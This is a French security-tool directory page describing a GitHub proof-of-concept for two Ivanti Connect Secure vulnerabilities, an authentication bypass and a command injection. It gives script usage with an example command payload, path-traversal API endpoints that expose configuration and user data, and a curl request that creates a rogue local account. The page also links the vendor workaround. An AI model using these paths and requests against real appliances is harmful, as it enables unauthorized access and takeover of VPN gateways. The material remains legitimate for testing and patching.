Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46805_CVE-2024-21887 — Une vulnérabilité de contournement d'authentification dans le composant web d'Ivanti ICS 9.x, 22.x et Ivanti Policy Secure permet à un attaquant distant d'accéder à des ressources restreintes en contournant les contrôles de sécurité. | Kitploit
Outils/GitHubGitHub/duy-31/cve-2023-46805_cve-2024-21887
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubduy-31/cve-2023-46805_cve-2024-21887

CVE-2023-46805_CVE-2024-21887

Une vulnérabilité de contournement d'authentification dans le composant web d'Ivanti ICS 9.x, 22.x et Ivanti Policy Secure permet à un attaquant distant d'accéder à des ressources restreintes en contournant les contrôles de sécurité.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
2343il y a 2 ansVérifié par Kitploit
Partager

CVE-2023-46805

Une vulnérabilité de contournement d'authentification dans le composant Web d'Ivanti ICS 9.x, 22.x et Ivanti Policy Secure permet à un attaquant distant d'accéder à des ressources restreintes en contournant les contrôles.

utilisation: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

image

Remarques : chmod +x CVE-2023-46805.sh
nécessite les applications curl + json_pp

Résultat si vulnérable, vous devriez voir certaines choses :

image

CVE-2024-21887

Une vulnérabilité d'injection de commandes dans les composants Web d'Ivanti Connect Secure (9.x, 22.x) et Ivanti Policy Secure permet à un administrateur authentifié d'envoyer des requêtes spécialement conçues et d'exécuter des commandes arbitraires sur l'appliance.

  • exécutez le poc (il essaiera les 2 points d'entrée)

utilisation: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

Résultat si vulnérable, vous devriez voir certaines choses et votre payload devrait fonctionner : image

Remarques : chmod +x CVE-2024-21887.sh
nécessite les applications curl, xxd, tr & sed

Informations intéressantes

/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users

/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users

-créer un compte /authentication/auth-servers/authserver/System%20Local/local/users/user

-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'



Solution de contournement/Correction : https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

Crédits : https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis


plus d'infos sur moi ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Avertissement : IMPORTANT : Ce script est fourni à des fins éducatives, de test éthique et d'utilisation légale UNIQUEMENT. Ne l'utilisez sur aucun système ou réseau sans autorisation explicite. L'accès non autorisé à des systèmes informatiques et des réseaux est illégal, et les utilisateurs pris en flagrant délit d'activités non autorisées sont passibles de poursuites judiciaires. L'auteur n'est PAS responsable des dommages causés par une mauvaise utilisation de ce script.

Télécharger l’outil